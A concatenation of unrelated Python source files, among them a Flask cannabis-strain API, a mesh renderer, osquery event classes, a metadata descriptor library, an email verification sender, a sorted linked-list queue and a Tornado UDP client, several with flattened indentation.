def parse_json():
print('Fetching payload')
pyld = request.get_json()
print('Preprocessing payload')
preprocessed = clean_payload(pyld)
print('Processing payload')
recs = find_rec_strains(preprocessed)
print('Preparing response')
clean_recs = clean_response(recs, pyld['UserID'])
print('Sending response')
response = app.response_class(
json.dumps(clean_recs, sort_keys=False, indent=4),
mimetype=app.config['JSONIFY_MIMETYPE']
)
return response
@from_back_routes.route('/json')
def parse_json2():
backend_url1 = f"https://raw.githubusercontent.com/jae-finger/med_cabinet_4/master/test_strain.json"
response1 = requests.get(backend_url1)
res_text = response1.text
parsed_response1 = json.loads(res_text)
return jsonify(parsed_response1)
@from_back_routes.route('/')
def land_page():
return render_template("index.html", message="A datascience API for serving up cannabis strains to a webdev team")
@from_back_routes.route('/references')
def refer_page():
return render_template("references.html", message="A datascience API for serving up cannabis strains to a webdev team")
|
import numpy as np
import pyrender
import trimesh
import math
from pyrender.constants import RenderFlags
import config
class Renderer:
"""
Renderer used for visualizing the SMPL model
Code adapted from https://github.com/vchoutas/smplify-x
"""
def __init__(self, faces, img_res=512):
self.renderer = pyrender.OffscreenRenderer(viewport_width=img_res,
viewport_height=img_res,
point_size=1.0)
self.camera_center = [img_res // 2, img_res // 2]
self.faces = faces
self.img_res = img_res
# set the scene
self.scene = pyrender.Scene(bg_color=[0.0, 0.0, 0.0, 0.0],
ambient_light=(0.3, 0.3, 0.3))
light = pyrender.PointLight(color=[1.0, 1.0, 1.0], intensity=1.)
light_pose = np.eye(4)
light_pose[:3, 3] = [0, -1, 1]
self.scene.add(light, pose=light_pose)
light_pose[:3, 3] = [0, 1, 1]
self.scene.add(light, pose=light_pose)
# light_pose[:3, 3] = [1, 1, 2]
# self.scene.add(light, pose=light_pose)
def __call__(self, verts, cam_trans, img=None, angle=None, axis=None, mesh_filename=None,
color=[0.8, 0.3, 0.3], return_mask=False):
mesh = trimesh.Trimesh(verts, self.faces, process=False)
Rx = trimesh.transformations.rotation_matrix(np.radians(180), [1, 0, 0])
mesh.apply_transform(Rx)
cam_trans[0] *= -1.
        if angle is not None and axis is not None:
# Apply given mesh rotation to the mesh - useful for rendering from different views
R = trimesh.transformations.rotation_matrix(math.radians(angle), axis)
mesh.apply_transform(R)
material = pyrender.MetallicRoughnessMaterial(
metallicFactor=0.2,
alphaMode='OPAQUE',
baseColorFactor=(color[0], color[1], color[2], 1.0))
mesh = pyrender.Mesh.from_trimesh(mesh, material=material)
mesh_node = self.scene.add(mesh, 'mesh')
camera_pose = np.eye(4)
camera_pose[:3, 3] = cam_trans
camera = pyrender.IntrinsicsCamera(fx=config.FOCAL_LENGTH, fy=config.FOCAL_LENGTH,
cx=self.camera_center[0], cy=self.camera_center[1])
cam_node = self.scene.add(camera, pose=camera_pose)
rgb, rend_depth = self.renderer.render(self.scene, flags=RenderFlags.RGBA)
valid_mask = (rend_depth > 0)
if return_mask:
return valid_mask
else:
if img is None:
img = np.zeros((self.img_res, self.img_res, 3))
valid_mask = valid_mask[:, :, None]
output_img = rgb[:, :, :-1] * valid_mask + (1 - valid_mask) * img
image = output_img.astype(np.uint8)
self.scene.remove_node(mesh_node)
self.scene.remove_node(cam_node)
return image
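# Minimal usage sketch (assumes SMPL-style inputs: `faces` is an (F, 3) face
# index array, `verts` a (V, 3) vertex array, `cam_trans` a length-3 camera
# translation):
#
#     renderer = Renderer(faces, img_res=512)
#     image = renderer(verts, cam_trans, color=[0.8, 0.3, 0.3])
#     mask = renderer(verts, cam_trans, return_mask=True)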
|
from leapp.actors import Actor
from leapp.libraries.actor import reportsettargetrelease
from leapp.models import Report
from leapp.tags import IPUWorkflowTag, TargetTransactionChecksPhaseTag
class ReportSetTargetRelease(Actor):
"""
Reports information related to the release set in the subscription-manager after the upgrade.
When using Red Hat subscription-manager (RHSM), the release is set by default
    to the target version release. When RHSM is skipped (--no-rhsm), the
    release stays as it was on the source RHEL major version and the user
    has to handle it manually after the upgrade.
"""
name = 'report_set_target_release'
consumes = ()
produces = (Report,)
tags = (IPUWorkflowTag, TargetTransactionChecksPhaseTag)
def process(self):
reportsettargetrelease.process()
|
from datetime import datetime
import logging
from zentral.core.events.base import BaseEvent, EventMetadata, EventRequest, register_event_type
from zentral.core.queues import queues
logger = logging.getLogger('zentral.contrib.osquery.events')
ALL_EVENTS_SEARCH_DICT = {"tag": "osquery"}
class OsqueryEvent(BaseEvent):
tags = ["osquery"]
class OsqueryEnrollmentEvent(OsqueryEvent):
event_type = "osquery_enrollment"
register_event_type(OsqueryEnrollmentEvent)
class OsqueryRequestEvent(OsqueryEvent):
event_type = "osquery_request"
tags = ['osquery', 'heartbeat']
heartbeat_timeout = 2 * 60
register_event_type(OsqueryRequestEvent)
class OsqueryResultEvent(OsqueryEvent):
event_type = "osquery_result"
def get_notification_context(self, probe):
ctx = super().get_notification_context(probe)
if 'action' in self.payload:
ctx['action'] = self.payload['action']
if 'columns' in self.payload:
ctx['columns'] = self.payload['columns']
query_name = self.payload.get("name")
if query_name:
try:
ctx['query'] = probe.scheduled_queries[query_name]
except AttributeError:
                # not an OsqueryResultProbe
                pass
            except KeyError:
                logger.warning("Unknown query %s", query_name)
return ctx
register_event_type(OsqueryResultEvent)
class OsqueryDistributedQueryResultEvent(OsqueryEvent):
event_type = "osquery_distributed_query_result"
payload_aggregations = [
("empty", {"type": "terms", "bucket_number": 2, "label": "Empty?"}),
("error", {"type": "terms", "bucket_number": 2, "label": "Error?"}),
]
register_event_type(OsqueryDistributedQueryResultEvent)
class OsqueryFileCarvingEvent(OsqueryEvent):
event_type = "osquery_file_carving"
register_event_type(OsqueryFileCarvingEvent)
class OsqueryStatusEvent(OsqueryEvent):
event_type = "osquery_status"
register_event_type(OsqueryStatusEvent)
# Audit trail events
class OsqueryPackUpdateEvent(OsqueryEvent):
event_type = "osquery_pack_update"
register_event_type(OsqueryPackUpdateEvent)
class OsqueryPackQueryUpdateEvent(OsqueryEvent):
event_type = "osquery_pack_query_update"
register_event_type(OsqueryPackQueryUpdateEvent)
# Utility functions used by the osquery API views
def post_enrollment_event(msn, user_agent, ip, data):
OsqueryEnrollmentEvent.post_machine_request_payloads(msn, user_agent, ip, [data])
def post_request_event(msn, user_agent, ip, request_type, enrollment):
configuration = enrollment.configuration
data = {"request_type": request_type,
"enrollment": {"pk": enrollment.pk,
"configuration": {"pk": configuration.pk,
"name": configuration.name}}}
OsqueryRequestEvent.post_machine_request_payloads(msn, user_agent, ip, [data])
def post_distributed_query_result(msn, user_agent, ip, payloads):
OsqueryDistributedQueryResultEvent.post_machine_request_payloads(msn, user_agent, ip, payloads)
def post_file_carve_events(msn, user_agent, ip, payloads):
OsqueryFileCarvingEvent.post_machine_request_payloads(msn, user_agent, ip, payloads)
def post_finished_file_carve_session(session_id):
queues.post_raw_event("osquery_finished_file_carve_session",
{"session_id": session_id})
def _get_osquery_log_record_created_at(payload):
return datetime.utcfromtimestamp(float(payload.pop('unixTime')))
def _post_events_from_osquery_log(msn, user_agent, ip, event_cls, records):
for record in records:
for k in ("decorations", "numerics", "calendarTime", "hostIdentifier"):
if k in record:
del record[k]
event_cls.post_machine_request_payloads(msn, user_agent, ip, records, _get_osquery_log_record_created_at)
def post_results(msn, user_agent, ip, results):
_post_events_from_osquery_log(msn, user_agent, ip, OsqueryResultEvent, results)
def post_status_logs(msn, user_agent, ip, logs):
_post_events_from_osquery_log(msn, user_agent, ip, OsqueryStatusEvent, logs)
# Utility function for the audit trail
def post_osquery_pack_update_events(request, pack_data, pack_queries_data):
event_request = EventRequest.build_from_request(request)
pack_update_event_metadata = EventMetadata(OsqueryPackUpdateEvent.event_type, request=event_request)
pack_update_event = OsqueryPackUpdateEvent(pack_update_event_metadata, pack_data)
pack_update_event.post()
for idx, pack_query_data in enumerate(pack_queries_data):
pack_query_update_event_metadata = EventMetadata(OsqueryPackQueryUpdateEvent.event_type, request=event_request,
uuid=pack_update_event_metadata.uuid, index=idx + 1)
pack_query_update_event = OsqueryPackQueryUpdateEvent(pack_query_update_event_metadata, pack_query_data)
pack_query_update_event.post()
|
import re
import sys
from abc import ABCMeta
from copy import copy as _copy, deepcopy
import logging
import typing as t
from types import MethodType
from collections import ChainMap
from collections.abc import Mapping, Callable
from threading import RLock
from laza.common.collections import fallbackdict, orderedset
from laza.common import text
from laza.common.data import assign
from .functools import export, Void
METADATA_ATTR = '_meta'
METADATA_CLASS_ATTR = '__metadata_class__'
# _class_registry = dict()
logger = logging.getLogger('flex')
T = t.TypeVar('T')
def get_metadata_class(cls: t.Type[T], attr: str,
final_attr: t.Optional[str] = None,
base: t.Type['BaseMetadata'] = None,
mro: t.Optional[t.Tuple[t.Type, ...]] = None,
name: t.Optional[str] = None,
dct: t.Optional[t.Mapping] = None,
set_final: t.Optional[bool] = False) -> type['BaseMetadata[T]']:
rv = final_attr and getattr(cls, final_attr, None)
if not rv:
bases = tuple(_iter_base_metadata_class(attr, mro or cls.mro(), base))
rv = type(name or f'{cls.__name__}Metadata', bases, dct or {})
return rv
def _iter_base_metadata_class(attr, mro, base=None):
seen = set((None,))
for c in mro:
oc = getattr(c, attr, None)
if oc not in seen:
seen.update(oc.mro())
yield oc
base = base or BaseMetadata
if base not in seen:
yield base
__last_creation_index = 0
def _get_creation_order():
global __last_creation_index
__last_creation_index += 1
return __last_creation_index
_TF = t.TypeVar('_TF')
@export
class metafield(t.Generic[_TF]):
"""Descriptor for meta fields.
"""
__slots__ = (
'__name__', '__objclass__', '__weakref__', 'doc', 'field',
'fload', 'fget', 'fset', 'fdel', '_creation_order',
'inherit', 'default', 'lock', 'alias'
)
def __init__(self, fload=None, field=None, fget=None, fset=None, fdel=None,
name=None, default=None, inherit=True, doc=None, alias: t.Union[bool, str]=None):
self.fload = self.fget = self.fset = self.fdel = None
self.__name__ = name
self.__objclass__ = None
self.alias = alias
self.doc = doc
if isinstance(fload, str):
assert field is None
self.field = fload
fload = None
else:
self.field = field
self.loader(fload)
self.getter(fget)
self.setter(fset)
self.deletter(fdel)
self.default = default
self.inherit = inherit
self.lock = RLock()
self._creation_order = _get_creation_order()
@property
def __doc__(self):
return self.doc
def __repr__(self):
attrs = ', '.join(f'{k}={getattr(self, k)!r}' for k in (
'field', 'alias', 'inherit'
))
return f"{self.__class__.__name__}({self.__name__!r}, {attrs})"
def __getstate__(self):
return { k: getattr(self, k) for k in (
'__name__', 'doc', 'field',
'fload', 'fget', 'fset', 'fdel',
'inherit', 'default', 'alias'
)}
def __setstate__(self, state):
keys = {'__name__', 'doc', 'field',
'fload', 'fget', 'fset', 'fdel',
'inherit', 'default', 'alias'}
for k in state.keys() & keys:
setattr(self, k, state[k])
self.__objclass__ = None
self._creation_order = _get_creation_order()
self.lock = RLock()
def loader(self, func):
if func is None or callable(func):
old = self.fload
self.fload = func
if self.doc is None or (old is not None and self.doc == old.__doc__):
self.doc = None if func is None else func.__doc__
if self.__name__ is None or (old is not None and self.__name__ == old.__name__):
self.__name__ = None if func is None else func.__name__
else:
raise TypeError('expected callable, got %s.' % type(func))
def getter(self, func):
if func is None or callable(func):
self.fget = func
return self
raise TypeError('Expected callable or None. Got %s.' % type(func))
def setter(self, func):
if func is None or callable(func):
self.fset = func
return self
raise TypeError('Expected callable or None. Got %s.' % type(func))
def deletter(self, func):
if func is None or callable(func):
self.fdel = func
return self
raise TypeError('Expected callable or None. Got %s.' % type(func))
def contribute_to_class(self, owner, name=None):
assert (name is None or self.__name__ is None) or self.__name__ == name, (
f'attribute __name__ must be set to bind {type(self)}'
)
if self.__objclass__:
assert issubclass(owner, self.__objclass__), (
f'can only contribute to subclasses of {self.__objclass__}. {owner} given.'
)
if name:
setattr(owner, name, self)
self.__set_name__(owner, name)
def __set_name__(self, owner, name):
if self.__objclass__ is None:
self.__objclass__ = owner
self.__name__ = name
elif self.__objclass__ is owner:
self.__name__ = name
else:
raise RuntimeError(f'__set_name__. metafield already bound.')
if not self.field:
self.field = name
if self.alias is True:
if self.field == name:
self.alias = False
else:
self.alias = name
elif self.alias == self.field:
self.alias = False
def __call__(self, fload: t.Callable[..., _TF]) -> 'metafield[_TF]':
assert self.fload is None, ('metafield option already has a loader.')
self.loader(fload)
return self
def __load__(self, obj) -> t.Union[_TF, t.Any]:
try:
# rv = obj.__raw__[self.field or self.__name__]
rv = obj.__raw__[self.field]
except KeyError:
if self.alias:
rv = obj.__raw__.get(self.alias, Void)
else:
rv = Void
except AttributeError:
rv = Void
try:
base = obj.__base__
except AttributeError:
base = None
if self.fload is None:
if rv is Void:
if self.inherit and base is not None:
rv = base.get(self.__name__, self.default)
else:
rv = self.default
if self.fset is not None:
self.fset(obj, rv)
rv = NotImplemented
else:
if not self.inherit or base is None:
args = ()
else:
try:
args = base[self.__name__],
except KeyError:
args = ()
rv = self.fload(obj, self.default if rv is Void else rv, *args)
if rv is not NotImplemented:
obj.__dict__[self.__name__] = rv
obj.__fieldset__.add(self.__name__)
return rv
def __get__(self, obj: 'BaseMetadata', cls) -> _TF:
if obj is None:
return self
fget = self.fget
if self.__name__ in obj.__fieldset__:
if fget is not None:
return fget(obj)
else:
try:
return obj.__dict__[self.__name__]
except KeyError:
raise AttributeError(self.__name__)
with self.lock:
rv = self.__load__(obj)
if fget is None:
if rv is NotImplemented:
raise AttributeError(self.__name__)
return rv
return fget(obj)
# return rv if self.fget is None else self.fget(obj, rv)
# return rv if self.fget is None else self.fget(obj)
def __set__(self, obj, value):
with self.lock:
if self.__name__ not in obj.__fieldset__:
self.__load__(obj)
if self.fset is not None:
# obj.__dict__[self.__name__] = self.fset(obj, value)
self.fset(obj, value)
elif self.fload is not None:
if self.inherit:
val = self.fload(obj, value, obj.__dict__.get(self.__name__))
else:
val = self.fload(obj, value)
if val is not NotImplemented:
obj.__dict__[self.__name__] = val
else:
obj.__dict__[self.__name__] = value
# obj.__fieldset__.add(self.__name__)
def __delete__(self, obj):
if self.fdel is not None:
self.fdel(obj)
obj.__dict__.pop(self.__name__, None)
obj.__fieldset__.discard(self.__name__)
if t.TYPE_CHECKING:
class metafield(metafield[_TF], property[_TF], t.Generic[_TF]):
def __get__(self, obj, cls) -> _TF:
...
class MetadataType(ABCMeta):
__fields__: orderedset
__fieldaliases__: fallbackdict
__fieldset__: orderedset[str]
def __new__(mcls, name, bases, dct):
cls = super().__new__(mcls, name, bases, dct)
cls.register_metafields()
# vardump(f'{cls.__module__}:{cls.__qualname__}', {f: getattr(cls, f) for f in cls.__fields__})
return cls
def get_class(self, target: type, attr, *, name=None):
if name is None:
name = text.uppercamel(f'{target.__name__}_{self.__name__}')
return get_metadata_class(target, attr, name=name, base=self)
def register_metafields(self):
self.__fields__= fieldset = orderedset()
self.__fieldaliases__ = aliases = fallbackdict(lambda k: k)
for name, field in self._iter_metafields():
field.contribute_to_class(self, name)
fieldset.add(name)
# field.field and fieldset.add(field.field)
if field.alias:
aliases[field.alias] = name
def _iter_metafields(self):
seen = set(self.__dict__)
for b in reversed(self.mro()[1:]):
for n in b.__fields__ if isinstance(b, MetadataType) else dir(b):
if n not in seen:
f = getattr(self, n, None)
if isinstance(f, metafield):
seen.add(n)
yield n, deepcopy(f)
for n in self.__dict__:
f = getattr(self, n)
if isinstance(f, metafield):
yield n, f
# fields = (
# (k,v) for b in self.mro()
# for k in b.__dict__
# if isinstance(v := getattr(self, k, None), metafield)
# )
# return fields
# mro.append(None)
# yield from sorted(fields, key=lambda kv: (mro.index(kv[1].__objclass__)+1, kv[1]._creation_order))
def _to_dict(obj, default=None, skip: str=r'^__'):
if obj is None:
return default
elif isinstance(obj, Mapping):
return obj
skip = skip and re.compile(skip).search
skipfn = skip and (lambda v: not skip(v)) or None
return { k: getattr(obj, k) for k in filter(skipfn, dir(obj)) }
TT = t.TypeVar('TT')
@export
class BaseMetadata(t.Generic[T], metaclass=MetadataType):
# __slots__ =(
# '__name__', '__raw__', '__base__', 'target', '__allowextra__',
# '__dict__', '__weakref__'
# )
__fields__: orderedset
__fieldaliases__: dict[str, str]
__name__: str
__allowextra__: t.ClassVar[bool] = False
__add_to_target__: t.ClassVar[bool] = True
target: t.Type[T]
def __init__(self, target = None, name=None, raw=None, base=None, *, allowextra=None):
# self.target = None
self.__fieldset__ = set()
self.__raw__ = _to_dict(raw, default=dict())
self.__base__ = _to_dict(base, skip=None)
if allowextra is not None:
self.__allowextra__ = allowextra
self.target = target
(None is target) or (None is name is base) or self.__load__(name)
@property
def __objclass__(self) -> t.Type[T]:
return self.target
@property
def _metadataloaded_(self):
return not(hasattr(self, '__raw__') or hasattr(self, '__base__'))
def __set_name__(self, owner, name):
if self.target is None:
self.target = owner
# if self.__add_to_target__: # and isinstance(owner, type):
# setattr(owner, name, self)
# name and self.__load__(name)
self.__load__(name)
else:
assert self.target is owner, (
f'{type(self)} already added to {self.target}. adding: {owner}.'
)
def __load__(self, name):
if not hasattr(self, '__raw__'):
raise RuntimeError(f'{type(self)} already loaded for {self.target}.')
if name and self.__add_to_target__:
setattr(self.target, name, self)
if self.__base__ is None and name:
self.__base__ = self._base_from_target(self.target, name)
self.__name__ = name
fieldset = self.__fieldset__
fieldset.clear()
for f in self.__fields__:
getattr(self, f, None)
if self.__allowextra__:
skip = set(dir(self)) | fieldset | self.__fields__ | self.__fieldaliases__.keys()
for k in self.__raw__.keys() - skip:
if isinstance(k, str) and k[0] != '_':
fieldset.add(k)
setattr(self, k, self.__raw__[k])
for k in self.__base__.keys() - (skip | fieldset):
if isinstance(k, str) and k[0] != '_':
fieldset.add(k)
setattr(self, k, self.__base__[k])
self.__loaded__()
del self.__raw__
del self.__base__
self.__ready__()
def __loaded__(self):
pass
def __ready__(self):
pass
def copy(self, **replace):
if not self._metadataloaded_:
raise RuntimeError(f'{self.__class__.__name__} not loaded')
rv = _copy(self)
replace and rv.__dict__.update(replace)
return rv
def __getstate__(self):
if not self._metadataloaded_:
raise RuntimeError(f'{self.__class__.__name__} not loaded')
return self.__dict__.copy()
def __setstate__(self, val):
self.__dict__.update(val)
# def __getattr__(self, alias):
# name = self.__fieldaliases__[alias]
# if name is alias:
# tb = sys.exc_info()[1]
# # return NotImplemented
# raise AttributeError(alias).with_traceback(tb)
# return getattr(self, name)
@classmethod
def _base_from_target(cls, target, attr):
if isinstance(target, type):
maps = (getattr(b, attr, None) for b in target.__bases__)
maps = (b for b in maps if isinstance(b, BaseMetadata))
return ChainMap({}, *maps)
return getattr(target.__class__, attr, {})
def get(self, key, default=None):
try:
return self[key]
except KeyError:
return default
def update(self, *args, **kwds):
assign(self, *args, kwds)
def __iter__(self):
yield from self.__dict__
def __contains__(self, key):
# return self.__fieldset__.__contains__(key) and hasattr(self, key)
return isinstance(key, str) and hasattr(self, key)
def __getitem__(self, key):
# if isinstance(key, str):
# if True or not text.is_dunder(key):
try:
return getattr(self, key)
except AttributeError:
raise KeyError()
def __setitem__(self, key, value):
setattr(self, key, value)
# def __repr__(self) -> str:
# # attrs = dict((k, self.__dict__[k]) for k in self.__dict__ if not text.is_dunder(k))
# print(self.__fieldset__)
# attrs = { k : self.get(k, ...) for k in self.__fieldset__ }
# return f'{self.__class__.__name__}({self.target.__name__}, {attrs})'
def __repr__(self) -> str:
return f'{self.__class__.__name__}({self.target})'
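# A minimal usage sketch (illustrative assumption, not from the source):
# metafields declared on a BaseMetadata subclass are loaded lazily from the
# target's raw options object, with loaders receiving the raw value (and the
# inherited base value, when one exists).
#
# class ModelMeta(BaseMetadata):
#     @metafield(default=False)
#     def abstract(self, value, base=None):
#         return bool(value)
#
# class Options:
#     abstract = True
#
# class Model:
#     pass
#
# ModelMeta(Model, '_meta', raw=Options)
# assert Model._meta.abstract is True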
|
import tensorflow as tf
import time
import numpy as np
tf.compat.v1.disable_eager_execution()
def main():
from neural_compressor.experimental import Quantization, common
quantizer = Quantization('./conf.yaml')
# Do quantization
quantizer.model = common.Model('./inception_v1.ckpt')
quantized_model = quantizer.fit()
if __name__ == "__main__":
main()
|
# -*- coding:utf-8 -*-
import smtplib, email
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.image import MIMEImage
from email.mime.base import MIMEBase
from email.mime.application import MIMEApplication
from email.header import Header
import secret_key, constants, random
from datetime import datetime
def send_email(rcptto, username=secret_key.USERNAME, password=secret_key.PASSWORD, replyto=secret_key.REPLYTO, error=0):
    '''Send a verification email.
    Parameters:
        username: the sender address created in the console
        password: the sender's password
        replyto: the reply-to address
        rcptto: the recipient address
    input: rcptto  recipient address
    output: code  verification code
    example:
        code = utils.send_email(rcptto='653128964@qq.com')
        print(code)
    '''
    # Generate a 6-digit verification code
    code = generate_verification_code()
    print("The verification code is", code)
    # Build the multipart/alternative structure
msg = MIMEMultipart('alternative')
    msg['Subject'] = Header('Verification Code').encode()
msg['From'] = '%s <%s>' % (Header('闲余翻身').encode(), username)
msg['To'] = rcptto
msg['Reply-to'] = replyto
msg['Message-id'] = email.utils.make_msgid()
msg['Date'] = email.utils.formatdate()
    # Build the text/html part of the alternative structure
html_file = open('./tools/templates/email.html','r',encoding="utf-8")
html_text = html_file.read().format(rcptto=rcptto, code=code) + '<style type="text/css">.qmbox style, .qmbox script, .qmbox head, .qmbox link, .qmbox meta {display: none !important;}</style></div></div><!-- --><style>#mailContentContainer .txt {height:auto;}</style> </div>'
texthtml = MIMEText(html_text, _subtype='html', _charset='UTF-8')
msg.attach(texthtml)
    # Send the email
try:
client = smtplib.SMTP_SSL(host='smtp.gmail.com', timeout=5)
client.connect('smtpdm.aliyun.com', 465)
        # SMTP debug output level (0 = disabled)
client.set_debuglevel(0)
client.login(username, password)
client.sendmail(username, rcptto, msg.as_string())
client.quit()
        print('Email sent successfully!')
except Exception as e:
# if error > 4:
# return -1
        print('Email sending failed:', str(e))
        # print('Resending...')
# error += 1
# code = send_email(rcptto, error=error)
return -1
return code
def generate_verification_code():
    '''Generate a 6-digit verification code.
    Parameters:
        input: None
        output: code
    '''
return ''.join(random.sample(constants.code_element_list, 6))
def model_repr(obj, pattern: str, orders):
    '''Return a representation in the specified format.
    Parameters:
        obj: a result object queried from the database
        pattern: the pattern string
        orders: the order of the required attributes
    '''
temp = []
for order in orders:
temp.append('"{}"'.format(order))
attr = getattr(obj, order)
if attr is None:
attr = '""'
elif isinstance(attr, (str, datetime)):
attr = '"{}"'.format(attr)
else:
attr = str(attr)
temp.append(attr)
return pattern % tuple(temp)
def make_pattern(orders_len: int):
    '''Build a pattern string of the specified length.
    Parameters:
        orders_len: the length of the list of required attributes
    '''
if orders_len <= 0:
        raise AttributeError('orders_len cannot be less than 1')
pattern = r'{'
for _ in range(orders_len - 1):
pattern += '%s: %s, '
pattern += r'%s: %s}'
return pattern
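# A small usage sketch (hypothetical Row class, not from the source):
# make_pattern(2) yields '{%s: %s, %s: %s}', which model_repr fills in the
# order given by 'orders'.
#
# class Row:
#     uid = 1
#     name = 'alice'
# print(model_repr(Row(), make_pattern(2), ['uid', 'name']))
# # -> {"uid": 1, "name": "alice"}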
|
from output.models.nist_data.atomic.unsigned_short.schema_instance.nistschema_sv_iv_atomic_unsigned_short_min_inclusive_2_xsd.nistschema_sv_iv_atomic_unsigned_short_min_inclusive_2 import NistschemaSvIvAtomicUnsignedShortMinInclusive2
__all__ = [
"NistschemaSvIvAtomicUnsignedShortMinInclusive2",
]
|
#!/usr/bin/python3
"""
A node to be used in a linked list
"""
class Node:
def __init__(self, data):
self.data = data
self.prev = None
self.next = None
"""
A class to represent the linked list queue
"""
class Linked_Queue:
def __init__(self, size):
self.size = size
self.list = []
self.head = None
self.tail = None
self.num_items = 0
"""
Enqueues the items to the array and returns if it is successful
"""
def enqueue(self, item):
if not self.is_full(): # If the list is not full, then we can add the item
node = Node(item) # We will make the new item into a node (for the linked list)
self.list.append(node) # We append the node to the list
if self.num_items == 0: # If there are no items in the list, set this as the head and tail
self.head = node
self.tail = node
self.num_items += 1
return True
elif item > self.tail.data: # If this item has a higher number than the tail (last item), then set it as the new tail
self.tail.next = node
node.prev = self.tail
self.tail = node
self.num_items += 1
return True
else:
current = self.head # Otherwise, loop through the list
while current is not None: # If the current node is None, then we are at the end of the list
                if current.data >= item: # Insert before the first node whose data is >= item (also handles duplicates correctly)
prev = current.prev
if prev is not None: # Make sure that the previous node exists
prev.next = node
else: # If it doesn't, then the new node should be the head
self.head = node
current.prev = node
node.prev = prev
node.next = current
self.num_items += 1
return True
current = current.next # Increment node
else:
return False # If the queue is full, then return false
"""
Dequeues an item from the queue and returns it, raise IndexError if the queue is empty
"""
def dequeue(self):
if not self.num_items == 0: # If the queue contains nodes, then it is possible to dequeue
node = self.head
if node.next is not None: # If the head has a next node (size is greater than 1) then set the next node to the head
next = node.next
next.prev = None
self.head = next
self.list.remove(node) # Remove the node from the list
self.num_items -= 1
return node.data # Return the node's data
else: # If the head has no next node (size is 1) then set head and tail to None, as list is now empty
self.head = None
self.tail = None
self.list.remove(node) # Remove the node from the list
self.num_items -= 1
return node.data # Return the node's data
else:
raise IndexError # If there are no items in the queue, raise an IndexError
"""
Returns whether the queue is full or not
"""
def is_full(self):
return self.num_items == self.size # If the number of items equals the size, then the queue is full
"""
Returns all the data in the form of a list of data (not nodes)
"""
def as_list(self):
py_list = [] # Initialize a list
current = self.head # Start the node at the head
while current is not None: # Loop through the existing nodes
py_list.append(current.data) # Add the current node's data to the list
current = current.next # Increment the current node to it's next node
return py_list # Return the new data list
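# A brief usage sketch (example values assumed): items are kept in ascending
# order, so dequeue always returns the smallest item first.
if __name__ == '__main__':
    queue = Linked_Queue(5)
    for value in (3, 1, 2):
        queue.enqueue(value)
    print(queue.as_list())  # [1, 2, 3]
    print(queue.dequeue())  # 1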
|
import os
from datetime import datetime
A_NONE = 'None'
A_PARTIAL = 'Partial'
A_FULL = 'Full'
A_FAIL = 'Fail'
A_PASS = 'Pass'
class Scan:
'''abstract class to scan a raw data file'''
file_path = None
file_size = None
reader = None
progress = 0 # completed percentage (0 - 100)
scan_result = {}
default_info = {
'byteCount': 0,
'recordCount': 0,
'pingCount': 0,
'missedPings': 0,
'startTime': None,
'stopTime': None,
'other': None,
}
    def __init__(self, file_path):
        self.file_path = file_path
        self.file_size = os.path.getsize(file_path)
        self.scan_result = {}  # per-instance dict; avoids sharing the mutable class attribute
def _time_str(self, unix_time):
'''return time string in ISO format'''
return datetime.utcfromtimestamp(unix_time)\
.isoformat(timespec='milliseconds')
def scan_datagram(self):
'''
scan data to extract basic information for each type of datagram
and save to scan_result
'''
def get_datagram_info(self, datagram_type):
        '''return info about a specific type of datagram'''
if datagram_type in self.scan_result.keys():
return self.scan_result[datagram_type]
return None
def get_total_pings(self, datagram_type=None):
        '''return the number of pings'''
if datagram_type is not None:
if datagram_type not in self.scan_result.keys():
return 0
return self.scan_result[datagram_type]['pingCount']
total = 0
for datagram_type in self.scan_result.keys():
total += self.scan_result[datagram_type]['pingCount']
return total
def get_missed_pings(self, datagram_type=None):
        '''return the number of missed pings'''
if datagram_type is not None:
if datagram_type not in self.scan_result.keys():
return 0
return self.scan_result[datagram_type]['missedPings']
total = 0
for datagram_type in self.scan_result.keys():
total += self.scan_result[datagram_type]['missedPings']
return total
def total_datagram_bytes(self):
'''return number of bytes of all datagrams'''
total_bytes = 0
for datagram_type in self.scan_result.keys():
total_bytes += self.scan_result[datagram_type]['byteCount']
return total_bytes
def is_size_matched(self):
'''check if number of bytes of all datagrams is equal to file size'''
return (self.total_datagram_bytes() == self.file_size)
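# A minimal sketch of a concrete reader (hypothetical subclass, not part of
# the source): scan_datagram is expected to fill scan_result with one info
# dict, shaped like default_info, per datagram type.
class ExampleScan(Scan):
    def scan_datagram(self):
        info = dict(self.default_info)
        info.update(byteCount=self.file_size, recordCount=1, pingCount=1)
        self.scan_result = {'EXAMPLE': info}
        self.progress = 100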
|
import tornado.iostream
import tornado.ioloop
import tornado.concurrent
import tornado
import time
import socket
import functools
import collections
class UDPRequest(object):
def __init__(self, addr, port, data, src_port=0):
self.addr = addr
self.port = port
self.data = data
self.src_port = src_port
class _UDPConnection(object):
def __init__(self, io_loop, request, release_callback, future, max_buffer_size):
self.start_time = time.time()
self.io_loop = io_loop
self.request = request
self.release_callback = release_callback
self.future = future
addrinfo = socket.getaddrinfo(
request.addr,
request.port,
socket.AF_INET,
socket.SOCK_DGRAM,
0,
0,
)
af, socktype, proto, canonname, sockaddr = addrinfo[0]
sock = socket.socket(af, socktype, proto)
if request.src_port:
sock.bind(('0.0.0.0', request.src_port))
self.stream = tornado.iostream.IOStream(
sock,
io_loop=self.io_loop,max_buffer_size=2500,
)
self.stream.connect(sockaddr,self._on_connect)
def _on_connect(self):
self.stream.write(self.request.data)
# TODO: buf size?
self.stream.read_bytes(1024, partial=True, callback=self._on_response)
def _on_response(self,data):
if self.release_callback is not None:
release_callback = self.release_callback
self.release_callback = None
release_callback()
if self.future:
self.future.set_result(data)
self.stream.close()
class AsyncUDPClient(object):
def __init__(self, io_loop=None):
self.io_loop = io_loop or tornado.ioloop.IOLoop.instance()
self.max_clients = 10
self.queue = collections.deque()
self.active = {}
self.max_buffer_size = 2500
# TODO: timeout
def fetch(self, request, **kwargs):
future = tornado.concurrent.Future()
self.queue.append((request, future))
self._process_queue()
return future
def _process_queue(self):
with tornado.stack_context.NullContext():
while self.queue and len(self.active) < self.max_clients:
request, future = self.queue.popleft()
key = object()
self.active[key] = (request, future)
_UDPConnection(
self.io_loop,
request,
functools.partial(self._release_fetch,key),
future,
self.max_buffer_size,
)
def _release_fetch(self,key):
del self.active[key]
self._process_queue()
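# A usage sketch (assumes the legacy Tornado 4.x API this module targets;
# the host, port and payload below are placeholders):
#
# def handle(future):
#     print(future.result())
#     tornado.ioloop.IOLoop.instance().stop()
#
# client = AsyncUDPClient()
# future = client.fetch(UDPRequest('127.0.0.1', 9999, b'ping'))
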